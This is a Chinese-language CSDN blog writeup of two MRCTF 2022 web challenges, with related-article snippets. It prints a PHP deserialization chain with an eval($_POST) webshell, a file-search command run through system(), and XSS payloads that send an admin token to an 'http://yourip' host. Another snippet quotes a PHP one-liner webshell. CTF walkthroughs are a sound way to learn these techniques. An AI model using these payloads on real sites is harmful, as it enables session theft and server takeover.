mrctf

最新推荐文章于 2023-06-09 22:20:18 发布
最新推荐文章于 2023-06-09 22:20:18 发布
阅读量1k 收藏
点赞数 1
分类专栏: 比赛复现 文章标签: web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/shinygod/article/details/124427285
版权

webcheckin

这边的后台检测有点迷,只要再payload前加些其他数据就可以绕过。
例如:

<?php
class Modifier {
    protected  $var='php://filter/read=convert.base64-encode/resource=flag.php';
}

class Show{
    public $source;
    public $str;
    public function __construct($file='index.php'){
        $this->source = $file;
    }
}

class Test{
    public $p;
    public function __construct(){
        $this->p = new Modifier();
    }
}


$a = new Show("self");
$a->str = new Test();//可以触发__get
$c = new Show($a);
echo urlencode(serialize($c));
eval($_POST[1]);
?>

然后就要慢慢的找flag,但是再r4战队大佬的wp里看到了一个查找flag的命令。

1=system(" find /var -type f | xargs grep 'MRCTF{' ");

查找/var目录及其子目录下的普通文件内容经过过滤匹配MRCTF{,再输出。

web_of _gpa

这题的大致思路是通过server端访问client端的文章,通过在client端文章处写入获取token的xss,最后在client端用admin的token登录在查看成绩处就可以看到flag了。

步骤:先依次写入两篇文章
这边我用的https://xss8.cc/平台来xss

<a id=MyImg><a id=MyImg name=src href='cid:ibukifalling"onerror="javascript:function getQueryVariable(variable)
        {
               var query = window.location.search.substring(1);
               var vars = query.split(`&`);
               for (var i=0;i<vars.length;i++) {
                       var pair = vars[i].split(`=`);
                       if(pair[0] == variable){return pair[1];}
               }
               return(false);
        }
        var token = getQueryVariable(`token`);
        console.log(token);
        document.write(`<img src=http://yourip/?token=`+token+` >`);
        "//'></a>

<a id=MyImg><a id=MyImg name=src href='cid:ibukifalling"onerror="javascript:setTimeout(function(){location.href=`http://brtserver.node3.mrctf.fun/oauth/authorize?redirect_uri=http://brtclient.node3.mrctf.fun/view/part1uuid`},1000)"//'></a>

在这里插入图片描述
然后再访问xss(这边就是第二篇文章),然后他就会跳转到第一篇文章,带上admin的token访问我们的vps

在这里插入图片描述
最后带上admin的token访问client链接查看成绩就可以看到flag了。

http://brtclient.node2.buptmerak.cn/login?token=WRntNQwD9RY8S1RTJRb4rTWDPEptAAaA

在这里插入图片描述

参考wp:

r4kapig
Y4tacker
web_of_gpa

succ3
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
MRCTF
Amherstieae的博客
04-24 1770
写在前面:这里是β-AS,是被这次比赛虐的体无完肤的菜鸡,通过这次比赛学到了很多知识,包括各种工具和命令(渣渣路过)虽然很多都是知识盲区,ε=(´ο`*)))唉还是我刷的题不够多 还有一个体会是:为什么压缩包没有忘记密码这个选项(o(╥﹏╥)o) CYPTO 。1古典密码知多少 当当当!!首先出现的是古典密码——猪圈及其变形(圣武士密码),还有宇宙的信号~ 猪圈咱就不说了,都是老熟人了 附上银河...
MRCTF复现
weixin_44377940的博客
04-02 1120
目录Misc千层套路ezmiscWebEzpop套娃pyflagez_bypass传马ez_auditEzpop_Revenge Misc 千层套路 和BJDCTF的一题一样,密码为文件名,重复解压,脚本跑就完事了。 ezmisc 修改行高。 Web Ezpop 点开即可看到源码,如下: <?php //flag is in flag.php //WTF IS THIS? //Learn...
MRCTF部分题的总结与复现
qwzf
04-10 8997
0x00 前言 题目整体来说不太难,毕竟是个新生赛。但考察的知识点等方面,确实需要总结一下。于是我总结了部分MISC、Crypto和Web。
MRCTF 2020 Crypto writeup
Slightwind's Blog
03-29 2567
MRCTF 2020 Crypto writeup
BUUCTF之[MRCTF2020]你传你呢-------文件解析漏洞
weixin_44632787的博客
06-19 8894
BUUCTF之[MRCTF2020]你传你????呢 虽然这题对于大佬来说是属于简单题。但是对于我这种小白来说却是第一次见。算是学到东西了。所以在此记录一下,以后看到这种类似的题目也可以回来复习。。。 首先,启动挑战的项目 emmmmmmm这个页面很有个性。。。一开始以为只是个简单的文件上传漏洞,结果没做出来。 不管怎么样,先上传一句话木马。并且将下面的内容保存成文件1.png GIF89a? <script language="php">eval($_POST['zyh']);</s
vigenere-cipher:Vigenere密码
03-19
它由重复26行/列的字母表组成,但是第一个字母被推到字母表的末尾,并且一直持续到z是第25行中的第一个字母为止。然后,程序将密钥用于行,将消息加密用于列。字母匹配,并显示加密的消息。标点和空格保持不变。
CTF 逆向练习-Transform
06-10
该资源配合博客使用,博客我还没写。 有空我会在哔哩哔哩录制教程。
采区含断层工作面冲击失稳预测
04-19
本文以矿井西二采区某一工作面为工程背景,根据数值模拟峰前扰动时断层面应力、位移分叉趋势对断层冲击地压危险区域进行了初步划分,通过现场电磁辐射监测结果分析可知:预测的预警距离是工作面距断层35m时应当采取加强...
向前欧拉法matlab代码-zbc-ops:我的GitHub个人资料的配置文件
05-20
1.mrctf[friendly_sign-in] 意思就是服务器产生一个数组$N$,需要输入一个数组$X$与其对应位置乘积和为$0$,题目说$N$中全为素数,实际好像不是,因为产生这么多素数比较耗时间,但里面还是大部分都是素数。这里可以...
mrctf2020_shellcode详解
最新发布
勿山几已
06-09 515
简单演示mrctf2020_shellcode解题步骤
[MRCTF 2022]web题目复现
cosmoslin的博客
04-27 1470
WEB webcheckin 一个文件上传点,可以上传webshell但是有检测,这里用二进制绕过 <?php class KUYE{ public $DAXW = null; public $LRXV = null; function __construct(){ $this->DAXW = '1100101 1110110 1100001 1101100 101000 100100 1011111 1010000 10011
MRCTF—Web】做题+复现记录
Lemon's blog
04-27 1314
套娃 查看源码发现这一串代码, substr_count() 函数计算子串在字符串中出现的次数 $_SERVER['QUERY_STRING'] 例如: http://localhost/aaa/index.php?p=222&q=333 结果: $_SERVER['QUERY_STRING'] = "p=222&q=333"; 想绕过去就必须满足我们传入的参数没有_,而且得通...
CTF基础知识
热门推荐
逐梦的博客
09-09 2万+
CTF基础知识一、语言运用 :计算机语言可以大致分为机器语言,汇编语言,高级语言,计算机每进行的一次动作,一个步骤,都是按照计算机语言编好的程序来执行。而在CTF比赛中,计算机语言的了解与掌握会有事半功倍的效果,进程的动态调试、防护脚本的编写、源代码审计等工作都是建立在对计算机语言有所掌握的基础上进行的。二、Web安全 :目前国内大多数CTF比赛都以Web安全为主,但是Web安全涉及的内容非常广泛,
mrctf-wp- re
令则
03-30 694
mrctf-wp re pwn 题目贼棒,出题师傅们tql! 其他题目都不会,猜的 比赛的id: 1ing23 - 文章目录mrctf-wpreTransformPixelShooterlolhello_world_goJunkHard-to-goShitEasyCppVirtual TreepwneasyoverflowshellcodeEasy_equationcryptokeyboar...
MRCTF2021 ETH uncertainty
feng的博客
04-21 646
前言 昨天前天遇到的区块链题目有有些远超我目前的能力范围了,因此做的非常难受,决定先扔了,循序渐进,不好高骛远。突然想到MRCTF2021的那2道区块链自己还没有去复现,昨天想着去复现,今天发现MRCTF的站关了。。。利用着大师傅的WP上面的记录,找到了目标合约,进行复现。不过这题本身是没有给源码的,是需要逆向的,奈何我源码都读了几遍了才知道。。。没办法就直接拿着源码来复现叭。这题的难点其实还是逆向,直接看源码的话就会简单许多。 WP 源码: pragma solidity ^0.4.17; interf
CTF逆向-[De1CTF2019]Re_Sign-简单脱壳和base64换表编码的深度算法跟踪
serfend's blog
05-02 2589
CTF逆向-[De1CTF2019]Re_Sign-简单脱壳和base64换表编码的深度算法跟踪 来源:https://buuoj.cn/ 内容: 附件: 链接:https://pan.baidu.com/s/1BXcr8EQfqs8fLHh2V874kg?pwd=acal 提取码:acal 答案:de1ctf{E_L4nguag3_1s_K3KeK3_N4Ji4} 总体思路 发现upx老版本的壳,使用老版本upx去除 发现输入的值会被编码, 找到编码的地方并猜测其编码方式 发现是base64编码,发现编
MRCTF 2020-“TiKi小组”
pone2233的博客
03-29 2481
文章目录题目状态:赛事信息Web:ez_bypass | SOLVED|你传你????呢 | SOLVED|PYwebsite | SOLVED|套娃 | SOLVED|Reverse:无Pwn:无Misc:Hello_Misc | OPEN |你能看懂音符吗 | SOLVED |CyberPunk | SOLVED |ezmisc | SOLVED |pyFlag | OPEN |Unravel!! ...
MRCTF 逆向题目简要分析
a3320315的博客
04-17 553
Transform 很简单的逻辑分析 payload: dword_40F040 = [0x09,0x0A,0x0F,0x17,0x07,0x18,0x0C,0x06,0x01,0x10,0x03,0x11,0x20,0x1D,0x0B,0x1E,0x1B,0x16,0x04,0x0D,0x13,0x14,0x15,0x02,0x19, 0x05,0x1F,0x08,0x12,0x1A,0x1C,...
CTF——MISC习题讲解(MRCTF2020系列)
tlovejr的博客
03-08 4126
CTF——MISC习题讲解(MRCTF2020系列) 前言 上一章节我们已经做完一场比赛的杂项题目,这次给大家介绍一下MRCTF中杂项题目 一、[MRCTF2020]pyFlag 题目链接如下: 链接:https://pan.baidu.com/s/1IQWks6UXUFq5gbkpcGp9sw?pwd=t05h 提取码:t05h 首先打开题目后发现共有三张图片 老规矩,对于杂项的题目先扔到winhex或者010Editor工具进行查看 但是发现这几张图片的结尾处都是存在压缩包数据 第一张图片 第二张图
re学习笔记(55)MRCTF-re-Transform | 撸啊撸
逆向随笔
03-30 4070
Transform 这一题比较简单,IDA64位载入,进入main函数看到有效代码 写脚本解密 #include <stdio.h> unsigned char data2[33] = { 0x67, 0x79, 0x7B, 0x7F, 0x75, 0x2B, 0x3C, 0x52, 0x53, 0x79, 0x57, 0x5E, 0x5D, 0x42, 0x7B, 0x2D...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值